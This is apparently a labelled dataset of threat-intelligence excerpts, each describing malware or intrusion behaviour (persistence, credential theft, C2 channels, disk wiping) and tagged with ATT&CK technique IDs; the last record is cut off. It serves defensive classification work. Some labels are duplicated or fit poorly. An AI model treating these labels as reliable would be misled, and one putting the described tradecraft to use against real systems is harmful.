{"text1":"They routinely used standard tools that would mimic legitimate administrator activities. They relied on encrypted SSH-based tunnels to transfer tools and for remote command\/program execution. They routinely deleted dropped attack tools, execution logs, files staged for exfiltration, and other files after they were finished with them. They renamed their tools' filenames in the staging folder so that it would not be possible to identify the malware's purpose, even after it was deleted from the disk through the residual artifacts (e.g. ShimCache entries or WMI Recently Used Apps). - They used timestomping to modify the $STANDARD_INFORMATION attribute of the attack tools","labels":"['T1021.004']"}
|
|
{"text1":"Consistent with the perceived goal of credential harvesting, the threat actors dropped and executed open source and free tools such as Hydra, SecretsDump, and CrackMapExec. Forensic analysis indicates that many of these tools were executed during the timeframe in which the actor was accessing the system","labels":"['T1110.002']"}
|
|
{"text1":"The files are extracted to a newly created folder with a randomized name under the same path, and the zip file is then deleted. The \u201cAJWrDz.exe\u201d executable path is written to the registry Run key \u201cHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\u201d to achieve persistence","labels":"['T1547.001']"}
|
|
{"text1":"KillDisk\u2019s infection chain. How is it dropped in the system? This KillDisk variant looks like it is intentionally dropped by another process\/attacker. The new KillDisk variant\u2019s parameter to shut down the affected machine. KillDisk also has a self-destruct process, although it isn\u2019t really deleting itself. Code snippets showing how KillDisk overwrites then deletes files. How does it wipe the disk? It reads the Master Boot Record (MBR) of every device it successfully opens and proceeds to overwrite the first 0x20 sectors of the device with \u201c0x00\u201d. It uses the information from the MBR to do further damage to the partitions it lists. KillDisk has a numeric parameter that denotes the number of minutes (15 being the default) it will wait before it shuts down the affected machine. To try to reboot the machine, it will try to terminate these processes: This is done most likely to force a reboot or dupe the user into restarting the machine","labels":"['T1134']"}
|
|
{"text1":"Bisonal used multiple lure documents to entice their victims to open and then be infected with Bisonal malware. Finally, in 2018, Ahnlab released a paper about \"Operation Bitter Biscuit\" where Bisonal was used against Korean and Japanese entities. This is an application document that has been used to provide a decoy to the Bisonal malware. The attacker also implemented a new order: execution of a command by using a named pipe to get the output of the executed command. This mechanism allows the malware to execute API functions without ever using the Call instruction, making it difficult to perform the analysis. So that it ensures the thread has a chance to run, it will return the API call sleep() no matter what was originally requested. Office Extension. In 2019, the actor behind Bisonal used a new way to deploy the malware on the target's systems. The purpose of the malware is to deploy Bisonal on the infected system ($tmp$\\tmplogon.exe) and to create a Run registry key in order to execute Bisonal at the next reboot of the system. The attacker implements indirect API calls by using the GetProcAddress() and LoadLibrary() APIs. Even if Bisonal could be considered simple with less than 30 functions, it has spent its life targeting sensitive entities in both the public and private sectors","labels":"['T1082']"}
|
|
{"text1":"NetPass.exe: a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives. WebBrowserPassView: a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module. Mail PassView: a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo Mail, and Gmail and passes them to the credential enumerator module. Once an available system is found, Emotet then writes the service component on the system, which writes Emotet onto the disk","labels":"['T1552.001']"}
|
|
{"text1":"The shellcode invokes PowerShell to issue a HTTP GET request for a random four (4) character URI on the root of autodiscovery[.]2bunny[.]com. The requests contain minimal HTTP headers since the PowerShell command is executed with mostly default parameters. Figure 5 depicts an HTTP GET request generated by the payload, with minimal HTTP headers","labels":"['T1071.001']"}
|
|
{"text1":"The biggest change is the network communication with the C2 server. The malware does not use a raw socket anymore but all the communications are performed with WinInet. The malware performs a connection to the C2 server by using InternetOpenA() with a hardcoded User-Agent: \"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322\". Note the missing parenthesis at the end of the User-Agent. This variant has exactly the same features as the previous variant: file listing, OS version getting, process killing, drive listing, execution via ShellExecuteW(), execution via named pipe, cleaning, file removal, file downloading. On the left a sample from Bisonal 2014 and on the right Bisonal 2011","labels":"['T1095']"}
|
|
{"text1":"We have seen Grandoreiro use DGA functions to generate a connection to a Google Sites page storing C2 information","labels":"['T1102.001']"}
|
|
{"text1":"When the .lnk file is initialized, it spawns a CMD process. This process executes a command to maliciously use the legitimate wmic.exe to initialize an XSL Script Processing (MITRE Technique T1220) attack. The attack executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain (qnccmvbrh.wilstonbrwsaq[.]pw","labels":"['T1059.003']"}
|
|
{"text1":"Due to its complex infection process that relies in part on registry updates with malware code, Valak can easily infect an unprotected Windows host. With ADS used to hide follow-up malware from a Valak infection, the risk is greatly increased","labels":"['T1012']"}
|
|
{"text1":"SchTasks.exe performs operations similar to those in Scheduled Tasks in Control Panel. You can use either tool to create, delete, configure, or display scheduled tasks. The user must be a member of the Administrators group on the computer that the command affects. To verify that a scheduled task ran or to find out why a scheduled task did not run, see the Task Scheduler service transaction log, Systemroot\\SchedLgU.txt. This log records attempted runs initiated by all tools that use the service, including Scheduled Tasks and SchTasks.exe. On rare occasions, task files become corrupted. Corrupted tasks do not run. When you try to perform an operation on corrupted tasks, SchTasks.exe displays the following error message: ERROR: The data is invalid. You cannot recover corrupted tasks. To restore the task scheduling features of the system, use SchTasks.exe or Scheduled Tasks to delete the tasks from the system and reschedule them","labels":"['T1053.005']"}
|
|
{"text1":"The OilRig group remains highly active in their attack campaigns while they continue to evolve their toolset. On January 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. The OilRig group sent two emails to two different email addresses at the same organization within a six minutes time span. The email contained an attachment named Seminar-Invitation.doc, which is a malicious Microsoft Word document we track as ThreeDollars. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time","labels":"['T1566.002']"}
|
|
{"text1":"SMOKEDHAM created a persistence mechanism for NGROK by adding VirtualHost.vbs to the WindNT value under the current users Run registry key","labels":"['T1547.001']"}
|
|
{"text1":"The third campaign deployed a different custom RPC backdoor to that used in the second campaign. This backdoor used code derived from the publicly available PowerShellRunner tool to execute PowerShell scripts without using powershell.exe. This was probably done to avoid them being written to the file system","labels":"['T1016', 'T1570']"}
|
|
{"text1":"Talos has identified two different infection vectors associated with this particular campaign. In order to compromise their victims, the threat actors sent the trojanized Microsoft Word documents, probably via email. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. The second vector is a trojanized Word document that prompts the victim to enable macros and run a Visual Basic script. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim's machine","labels":"['T1566.001']"}
|
|
{"text1":"The usage of VMProtected binaries is another very common TTP that we\u2019ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their toolkit","labels":"['T1027']"}
|
|
{"text1":"This script\u00a0is meant to delete the Pony Loader after execution (works in a loop, in order to wait for the sample to terminate).\u00a0The same can be found in Pony 1.9 code","labels":"['T1059.003', 'T1070.004']"}
|
|
{"text1":"Recently, a newer version was found in-the-wild, abusing NTFS Alternate Data Streams (ADS) in order to store the content of malicious payloads downloaded during execution. The main vector used by the group is sending malicious files in compressed format, attached to email. File types vary from VBS to LNK; the most recent campaign started to attach an HTML file which executes Javascript for downloading a malicious file","labels":"['T1204.002', 'T1059.005', 'T1564.004']"}
|
|
{"text1":"An appetite for stolen code-signing certificates Suckfly has a number of hacktools and malware varieties at its disposal. Figure 1 identifies the malware and tools based on functionality and the number of signed files with unique hashes associated with them","labels":"['T1553.002']"}
|
|
{"text1":"In recent weeks, TA551 has changed traffic patterns. 19, 2020, URLs generated by Word macros to retrieve installer binaries followed a noticeable pattern","labels":"['T1105']"}
|
|
{"text1":"The attack starts with a malicious XLS attachment, sent in a phishing email, containing an obfuscated macro that downloads a heavily packed second-stage downloader. The second stage fetches the encrypted third-stage, which includes three layered encrypted Lokibot. After a privilege escalation, the third stage deploys Lokibot","labels":"['T1566.001']"}
|
|
{"text1":"Naming conventions designed to blend into normal operations (e.g. amsc.exe, msvsvr.dll, alg.exe) - Dropping implants in folders named for legitimate software (e.g","labels":"['T1036.004', 'T1036.005', 'T1036.004']"}
|
|
{"text1":"The password-protected ZIP attachments contain a Microsoft Word document with macros to install malware. See Appendix A for examples of these Word documents from June 2020. Prior to April 2020, the most common malware caused by Word documents associated with Shathak\/TA551 was Ursnif. Since April 2020, the most common malware distributed by these Word documents has been Valak. Appendix C lists a series of Valak DLL examples from June 2020","labels":"['T1204.002']"}
|
|
{"text1":"The first lateral movement occurred to the domain controller not affected by the use of CVE-2020-1472. An executable was transferred to it via SMB using a domain administrator account","labels":"['T1569.002']"}
|
|
{"text1":"It is worth noting at this point that the C2 IP address associated with the cosecman[]com domain appeared to selectively block one of our exit IPs during our research","labels":"['T1016']"}
|
|
{"text1":"The tools uploaded to the webshells range from legitimate applications such as cURL to post-exploitation tools such as Mimikatz. We also observed the actors uploading custom backdoors such as HyperBro which is commonly associated with Emissary Panda","labels":"['T1588.002', 'T1027', 'T1046']"}
|
|
{"text1":"It is classified by NTT as a variant of the infamous TrickBot malware, which uses DNS tunneling to stealthily communicate with C2 servers. Though this variant was first discovered in October 2019, there is evidence that Anchor_DNS was used as far back as March 2019","labels":"['T1071.004']"}
|
|
{"text1":"Cisco Talos has observed another malware campaign that utilizes malicious Microsoft Office documents (maldocs) to spread the remote access trojan (RAT) ObliqueRAT. This campaign targets organizations in South Asia. ObliqueRAT has been linked to the Transparent Tribe APT group in the past. This campaign hides the ObliqueRAT payload in seemingly benign image files hosted on compromised websites","labels":"['T1204.001', 'T1204.002']"}
|
|
{"text1":"This is used to maintain access to a Meterpreter session. It is saved to C:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\msupdateconf.exe, granting the executable persistence. Another custom executable used to execute PowerShell scripts. The Mosquito JScript backdoor that uses Google Apps Script as its C&C server. Privilege escalation using the Metasploit module ext_server_priv.x86.dll [8","labels":"['T1102.002']"}
|
|
{"text1":"REvil sends the encrypted stat data containing the host profile and malware information to the C2 URL via the HTTP POST method. Detection of the associated network traffic is challenging because REvil uses the HTTPS protocol, which encrypts the network communication. The malware reads the subsequent C2 server response but implements no logic to act on the received data. Finally, REvil terminates execution","labels":"['T1041']"}
|
|
{"text1":"It will then jump to code that decrypts the Lokibot executable using decryption keys from the configuration structure. The first two layers are decrypted using `DecryptionKeyA` and `DecryptionKeyB`, and all the data is reversed. After that, the final layer is decrypted using the same decryption method used to decrypt resource data at the start of the third stage. The DLL contains multiple ways to execute a PE file. The shellcode will create a suspended process using the third parameter as a command line command and injects Lokibot into it using process hollowing","labels":"['T1055.012']"}
|
|
{"text1":"DEATHRANSOM is written in C while the other two families are written in C++. DEATHRANSOM uses a distinct series of do\/while loops to enumerate through network resources, logical drives, and directories","labels":"['T1082']"}
|
|
{"text1":"Taking advantage of the unprotected open Docker API port, the attackers are able to instantiate an Ubuntu container with the following entry point","labels":"['T1609']"}
|
|
{"text1":"1) NetPass.exe is a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives. 3) WebBrowserPassView is a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module. 4) Mail PassView is a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo! Mail, and Gmail and passes them to the credential enumerator module. Once an available system is found, Emotet writes the service component on the system, which writes Emotet onto the disk. Emotet\u2019s access to SMB can result in the infection of entire domains (servers and clients","labels":"['T1552.001']"}
|
|
{"text1":"Collect information about each disk, including directory and file lists, disk names, total space, and remaining space","labels":"['T1082']"}
|
|
{"text1":"For the first time, the ROKRAT sample used during the \"North Korean Human Rights\" contained a browser credentials stealer. For Chrome and Firefox, the malware queries the sqlite database containing the URL, username and password: Additionally, they support the Microsoft Vault mechanism. Vault was implemented in Windows 7; it contains any sensitive data (like the credentials) of Internet Explorer. Here is the initialization of the Vault APIs: On the left, we have the ROKRAT sample and on the right the FreeMilk sample","labels":"['T1555.004']"}
|
|
{"text1":"This exception invokes the exception handler containing the HTTP communication code, allowing it to run. If either attempt is successful, the C2 server will respond with the session ID and a pre-shared key in cleartext, which it will save to the previously mentioned registry key. The C2 server will provide the pre-shared key within the response data and will provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID parameter of the cookie. If both attempts fail and the payload is unable to obtain a session ID and pre-shared key via HTTP or HTTPS, it will try to use DNS tunneling. random number between 100000 and 999999>.<c2 name> This request notifies the C2 server that the payload is about to send system specific data as part of the initial handshake. The script will first attempt to communicate with the C2 server using HTTPS (HTTP if unsuccessful), which involves GET requests using the session ID within the request's cookie in the PHPSESSID field, as seen in the example GET request","labels":"['T1027']"}
|
|
{"text1":"Cobalt Strike appears to be one of BRONZE PRESIDENT's preferred remote access tools. During one intrusion, the threat actors installed it on over 70% of accessible hosts. The group's Cobalt Strike installation typically uses a payload named svchost.exe in an attempt to disguise Cobalt Strike activity as the legitimate Windows svchost.exe executable. BRONZE PRESIDENT installs PlugX using DLL side-loading. In June and August 2019, BRONZE PRESIDENT delivered PlugX via government and law enforcement-themed phishing lures. RCSession \u2014 This basic RAT is installed via DLL side-loading, and CTU researchers observed BRONZE PRESIDENT installing it on multiple hosts during intrusions. RCSession was extracted from a file called English.rtf and launched via a hollowed svchost.exe process. RCSession connects to its C2 server via a custom protocol, can remotely execute commands, and can launch additional tools. CTU researchers have no evidence of other threat actors using RCSession or of wide proliferation of the tool, suggesting it may be exclusively used by BRONZE PRESIDENT. Nbtscan being used via RCSession to scan an internal IP range","labels":"['T1574.002']"}
|
|
{"text1":"Let's use the example data 8,54351-1616479009,0 from a beacon sent from the payload to the C2, which it will encode using base64 to OCw1NDM1MS0xNjE2NDc5MDA5LDA=, append the @ symbol and embed within a BMP image. The 8-bits of this base2 representation are then used to set specific bits within the 3-bytes for each pixel","labels":"['T1027.003']"}
|
|
{"text1":"After all of the data is gathered, the malware starts communication with the C&C server by periodically sending HTTP POST requests to the following URL on the received domain","labels":"['T1041']"}
|
|
{"text1":"CTU researchers observed WCry variants demanding Bitcoin payments equivalent to $300 and $600. The Bitcoin address is provided in the c.wnry configuration file and can vary across samples. If no configuration file is present, the malware uses a hard-coded Bitcoin address. CTU researchers have identified the following Bitcoin addresses associated with the WCry ransomware","labels":"['T1486']"}
|
|
{"text1":"The first evidence of its intrusion dated from May 6, 2015 but activity appeared to have begun in earnest on May 12. The attackers appeared to be interested in one division of the ministry that is responsible for relations with the Asia-Pacific region. They attempted to extract all Word documents stored on a file server belonging to this division by bundling them into a RAR archive by running the following command","labels":"['T1039', 'T1083']"}
|
|
{"text1":"Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years. During this time it has managed to avoid scrutiny by the security community. The current version of the malware allows the operator to steal files, keystrokes, perform screenshots, and execute arbitrary code on the infected host. Talos has named this malware KONNI. Throughout the multiple campaigns observed over the last 3 years, the actor has used an email attachment as the initial infection vector. They then use additional social engineering to prompt the target to open a .scr file, display a decoy document to the users, and finally execute the malware on the victim's machine. The malware has evolved over time","labels":"['T1082']"}
|
|
{"text1":"While historically TA416 has delivered Zip files from cloud hosting providers containing a decoy file, legitimate PE file, a DLL loader, and a PlugX malware configuration DAT file, recent campaigns used a different tactic. Proofpoint researchers noted that the malicious Zip files delivered from DropBox now contain a rudimentary executable which is a dropper malware. This malware establishes persistence for a legitimate executable file used in DLL search order hijacking, as well as initiates the download of four components. These components are included below and resemble the components used in the past to install PlugX malware. Public research has previously documented TA416\u2019s propensity for including PlugX Trident Loader components and decoy in the initial delivered Zip file. The method of installing PlugX via DLL Search Order hijacking that displays a PDF decoy remains constant","labels":"['T1105']"}
|
|
{"text1":"uid= and writes a JSS Loader binary to %TEMP%\\PaintHelper.exe. JSS Loader, which has both .NET and C++ versions, has multiple capabilities, including the ability to load additional executables, PowerShell (PS) and JavaScript (JS) files","labels":"['T1059.007', 'T1105', 'T1059.001']"}
|
|
{"text1":"The actor behind Bisonal is clearly motivated and has an interest in Russian, Korean and Japanese victims. The development of Bisonal has been active for more than a decade. However, specific functions are still used today, many years after the original implementation of the Bisonal malware. Even if Bisonal could be considered as simple with less than 30 functions, it has spent its life targeting sensitive entities in both the public and private sectors. For example, in one campaign they put the domain name of the C2 server in plaintext in the malware which had the function to generate a non-ASCII string for the C2 servers once decoded. In this condition, the malware cannot work on the compromised system. With this investigation and the analysis of this decade of activity, we hope to force this actor to innovate by providing a better understanding of his arsenal and more specifically how Bisonal works","labels":"['T1140']"}
|
|
{"text1":"Figure 5: Registry Activity The script then determines the version of Powershell that is being used on the infected system. This is essentially the WMI equivalent of a registry-based run key from a persistence perspective. The Stage 3 malware is by default set to run 'onidle' after 30 minutes","labels":"['T1012']"}
|
|
{"text1":"TA505 briefly distributed the Kegotip information stealer in April 2017. Across two campaigns of several million messages each, the actor used both macro-laden Microsoft Word documents and zipped VBScript attachments to install the Trojan on potential victim PCs. Kegotip is an infostealer (credentials and email addresses) used to facilitate other crimeware activities. It steals credentials from various FTP clients, Outlook, and Internet Explorer. It also will gather email addresses scraped from files stored on the computer. This information can be used to facilitate future spam campaigns by the perpetrator or may be sold to other actors","labels":"['T1555.003', 'T1552.001']"}
|
|
{"text1":"Note: see the appendix for a list of the domains, file names, and malware MD5 hash values used to facilitate this activity","labels":"['T1027.003']"}
|
|
{"text1":"Register as a startup program in HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run if it has no privileges (Figure 6). Otherwise, it will register itself as a system service (Figure 7","labels":"['T1543.003']"}
|
|
{"text1":"The two resources that contain commands that ISMInjector uses for persistence are named \u201cTsk1\u201d and \u201cTsk2\u201d. The specific commands within each of these resources are within Table 1. At a high level, the \u201cTsk1\u201d command creates a scheduled task named \u201cReportHealth\u201d that is meant to run a payload saved to \u201c%localappdata%\\srvHealth.exe\u201d every 4 minutes. The \u201cTsk2\u201d command creates a scheduled task that runs every 2 minutes that is responsible for saving the payload to srvHealth.exe. This task saves the payload to this location using the \u201ccertutil\u201d command to decode the original payload saved to \u201csrvBS.txt","labels":"['T1053.005', 'T1140']"}
|
|
{"text1":"Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. The next-stage malware can best be described as a malicious file corrupter","labels":"['T1105']"}
|
|
{"text1":"PLEAD also dabbled with a short-lived, fileless version of their malware when it obtained an exploit for a Flash vulnerability (CVE-2015-5119) that was leaked during the Hacking Team breach","labels":"['T1203']"}
|
|
{"text1":"This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap","labels":"['T1027', 'T1106']"}
|
|
{"text1":"APT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts, sometimes coupled with social engineering tactics. In May 2016, we\u00a0published\u00a0a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware. The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199","labels":"['T1059.003', 'T1059.003']"}
|
|
{"text1":"The Cannon Trojan is written in C# and functions primarily as a downloader that relies on emails to communicate between the Trojan and the C2 server. To communicate with the C2 server, the Trojan will send emails to specific email addresses via SMTPS over TCP port 587","labels":"['T1041']"}
|
|
{"text1":"The encryption style does not differ significantly from other prominent ransomware families. WastedLocker will attempt to encrypt files on local as well as remote (network adjacent and accessible) and removable drives. Once the eligible drives are located, the ransomware will begin the encryption process","labels":"['T1120']"}
|
|
{"text1":"It implements a simple custom-built virtual machine mechanism that will execute an embedded bytecode to decode and inject the payload into memory","labels":"['T1027.002']"}
|
|
{"text1":"The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class","labels":"['T1140']"}
|
|
{"text1":"Tonto Team is an APT group active since at least 2009 and targeting governments and institutions mostly based in Russia, Japan and Mongolia. For more than ten years, Tonto Team has been using the Bisonal RAT. Tonto Team is one of the APT groups that now has access to the ShadowPad backdoor","labels":"['T1059.001', 'T1505.003', 'T1105']"}
|
|
{"text1":"The Bazar loader files are dual-extension executable files (such as PreviewReport.DOC.exe) signed with fake certificates such as VB CORPORATE PTY. This is consistent with the Trickbot group, which notoriously abuses the trust of certificate authorities by using signed loaders and malware to evade security product detection","labels":"['T1036.007']"}
|
|
{"text1":"To operate and evade standard analysis tools, most of the functions are hashed. The hashing algorithm has a high degree of similarity to the previous ShellTea version, with a slight modification of the seeds and constants. In this version, the attacker also utilizes functions from ole32 for stream processing","labels":"['T1027']"}
|
|
{"text1":"While the URI string has changed from Trickbot and Anchor variants, the phishing tactics and use of post-infection reconnaissance commands remains the same. In the Bazar backdoor, the tag (or gtag) used to identify Trickbot campaigns is removed from C2 URIs. It may have been moved to the cookie HTTP header parameter","labels":"['T1071.001']"}
|
|
{"text1":"Later in the execution chain, the SeLoadDriverPrivilege is used to load the extracted driver. Then one of the four drivers is dropped, after which the Volume Shadow Copy (VSS) service \u2013 which allows backups to be performed \u2013 is stopped","labels":"['T1490']"}
|
|
{"text1":"In addition to loading the communications module, the initial macro described above configures a persistence mechanism for this malware loader by setting up\u202fa\u202fRegistry\u202fRun key. The non-concatenated command included in the macro that establishes persistence for Libcurl.dll and the hash for this sample are included below","labels":"['T1547.001']"}
|
|
{"text1":"As part of the exploitation process, the above value will be written to the registry under the %windir% variable, and deleted after execution","labels":"['T1112']"}
|
|
{"text1":"The document contains an encoded Visual Basic Script (VBScript) typical of previous Carbanak malware. Recent samples of the malware\u00a0have now included\u00a0the ability to use Google services for command-and-control (C&C) communication. The module is base64 encoded inside the main VBScript file along with various other VBScript modules used by the malware. When we analyzed the script we noticed that it is capable of using Google services as a C&C channel. Abusing Google for C&C communication . The \"ggldr\" script will send and receive commands to and from Google Apps Script, Google Sheets, and Google Forms services. It is unlikely that these hosted Google services are blocked by default in an organization, so it is more likely that the attacker will establish a C&C channel successfully. Upon the first attempt to contact the hard-coded Google Apps Script URL with the user's unique infection ID, the C&C will state that no spreadsheet currently exists for the user. The malware will then send two requests to another hard-coded Google Forms URL which will result in the creation of unique Google Sheets spreadsheet and Google Form IDs for the victim. The second time the Google Apps Script is requested, the C&C will return the unique Google Sheet and Google Form ID values: The \"entry\" value is also a unique ID which is sent with each subsequent Google Forms C&C request. Using Google as an independent C&C channel is likely to be more successful than using newly created domains or domains with no reputation","labels":"['T1102.002']"}
|
|
{"text1":"Operation North Star C2 infrastructure consisted of compromised domains in Italy and other countries. Compromised domains belonged, for example, to an apparel company, an auction house and printing company. These URLs hosted malicious DOTM files, including a malicious ASP page","labels":"['T1608.001']"}
|
|
{"text1":"The installer looks legitimate and has a valid digital signature from Sectigo (Obtain Capabilities: Digital Certificates [T1588.004]). The signature was signed with a code signing certificate purchased by the same user as the SSL certificate for jmttrading[.]org (Obtain Capabilities: Code Signing Certificates [T1588.003]). The MSI Installer asks the victim for administrative privileges to run (User Execution: Malicious File [T1204.002","labels":"['T1588.004']"}
|
|
{"text1":"These platforms are used to exfiltrate documents and receive instructions. Here is a list of the platforms used by this variant: Twitter, Yandex and Mediafire. The tokens for each platform are hardcoded within the sample","labels":"['T1102.002']"}
|
|
{"text1":"Taken together, the VirusTotal submissions of the samples, the samples themselves, the ZIP containing the samples (observed as a dissemination mechanism via email attachment), as well as the RAR container (seen later in this report under the Analysis section) form a timeline beginning on 12 November","labels":"['T1566.001']"}
|
|
{"text1":"HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives","labels":"['T1059.003']"}
|
|
{"text1":"The malware proceeds to check to see if the original dropped malware file exists. In the event it does, Reaver will move this file to \u2018%TEMP%\\~FJIOW.tmp\u2019 and delete this new file. This simply acts as cleanup to ensure original file artifacts no longer reside on the infected machine. Reaver will then install itself as a service in the event it is running with SeDebugPrivilege privileges. Reaver continues to collect various information from the victim machine, including the following","labels":"['T1070.004']"}
|
|
{"text1":"The malware sample contains some interesting static artifacts including self-signed digital certificates used to sign the executable purporting to be software from the Foxit Software Incorporated company based in California","labels":"['T1553.002', 'T1553.002']"}
|
|
{"text1":"The two-stage malware overwrites the Master Boot Record (MBR) on victim systems with a ransom note (Stage 1). The MBR is the part of a hard drive that tells the computer how to load its operating system","labels":"['T1561.002']"}
|
|
{"text1":"Several files are created by Carbon to keep logs, tasks to execute and configuration that will modify the malware\u2019s behavior","labels":"['T1053.005']"}
|
|
{"text1":"The Distributed Transaction Coordinator (DTC) service coordinates transactions that update two or more transaction-protected resources, such as databases, message queues, files systems, and so on. These transaction-protected resources may be on a single computer or distributed across many networked computers","labels":"['T1036.005', 'T1036.005', 'T1036.005']"}
|
|
{"text1":"Seedworm then uses open-source tools such as LaZagne and Crackmapexec to obtain Windows authorization credentials. Seedworm uses off-the-shelf, unmodified versions of these tools as well as custom-compiled variants which we have determined are only used by this group","labels":"['T1552.001', 'T1555.003']"}
|
|
{"text1":"Initial access via a phishing email that linked to a Google Docs page that enticed the user to download a report, which was instead a Bazar Loader executable file, Report-Review20-10.exe","labels":"['T1566.002']"}
|
|
{"text1":"Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. Once executed in memory, the corrupter locates files in certain directories on the system with one of the following hardcoded file extensions","labels":"['T1102']"}
|
|
{"text1":"The encrypted request includes a PC identifier and timestamp, and optionally some other data. It is worth noting that the RC2FM module uses a number of encryption methods (variations of a simple XOR encryption routine), unlike the other InvisiMole parts","labels":"['T1140']"}
|
|
{"text1":"In these cases, the temporary file is written to the %TEMP% directory, and the filename is a combination of numbers generated from a call to GetTickCount and the '.dat' extension (e.g","labels":"['T1218.011']"}
|
|
{"text1":"In the past, this APT has relied on Hangul Office documents (hwp files) to target victims, as it\u2019s software that\u2019s commonly used in South Korea. However, in this blog we describe an interesting alternative method, delivered via self-decoding VBA Office files","labels":"['T1566.001']"}
|
|
{"text1":"Post-compromise, APT39 leverages custom backdoors such as SEAWEED, CACHEMONEY, and a unique variant of POWBAT to establish a foothold in a target environment. Internal reconnaissance has been performed using custom scripts and both freely available and custom tools such as the port scanner, BLUETORCH","labels":"['T1059', 'T1046']"}
|
|
{"text1":"Snippets of HOLMIUM PowerShell backdoor (POWERTON) implementing two different persistence mechanisms: WMI event subscription (T1084) and Registry run keys or Startup folder (T1060","labels":"['T1546.003', 'T1547.001']"}
|
|
{"text1":"1) Hunting for PDF files that are created with the same \u201cDocumentID\u201d management metadata field result in a set of files that have been used in email delivery against banking entities. 2) All of the PDF files embed a link based on a Google redirect, leading to the download of a Microsoft Office document file. 3) The Microsoft Office document files contain macros for code execution. Those macros match the characteristics of the builder that we have characterized","labels":"['T1204.002', 'T1204.001']"}
|
|
{"text1":"The ZIP archive contains a malicious portable executable (PE) file with embedded HTML application (HTA).\u00a0The user has to unzip the archive and double-click the executable for the infection chain to continue. The PE file is a simple HTA script compiled into an executable. When the user double-clicks the executable, the malicious HTA file is extracted to %temp% and executed by mshta.exe","labels":"['T1218.005', 'T1204.002']"}
|
|
{"text1":"The two dropped artifacts \u2013 a payload DLL and a Word document \u2013 are written to the \u201cUsers\\<Log on User>\\\u201d folder (the document will replace the opened malicious document with clean stub after killing the running Word process","labels":"['T1059.005']"}
|
|
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. CTU researchers identified two versions of Daserf written in Visual C and Delphi. Datper uses an RC4-encrypted configuration to obfuscate HTTP traffic. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. RarStar HTTP POST request. Use malware to upload the large list of enumerated files to the C2 server. When exfiltration is complete, the uploader (or Datper or xxmm) immediately uses the del command to delete the RAR archives. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","labels":"['T1573.001']"}
|
|
{"text1":"1) Suckfly's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company's internal network. We don't have hard evidence of how Suckfly obtained information on the targeted user, but we did find a large open-source presence on the initial target. 2) On April 22, 2015, Suckfly exploited a vulnerability on the targeted employee's operating system (Windows) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack. 3) After the attackers successfully exploited the employee\u2019s system, they gained access to the e-commerce company's internal network. With the account credentials, the attackers were able to access the victim's account and navigate the internal corporate network as though they were the employee. 4) On April 27, the attackers scanned the corporate internal network for hosts with ports 8080, 5900, and 40 open. Ports 8080 and 5900 are common ports used with legitimate protocols, but can be abused by attackers when they are not secured. It isn't clear why the attackers scanned for hosts with port 40 open because there isn't a common protocol assigned to this port. Based on Suckfly scanning for common ports, it\u2019s clear that the group was looking to 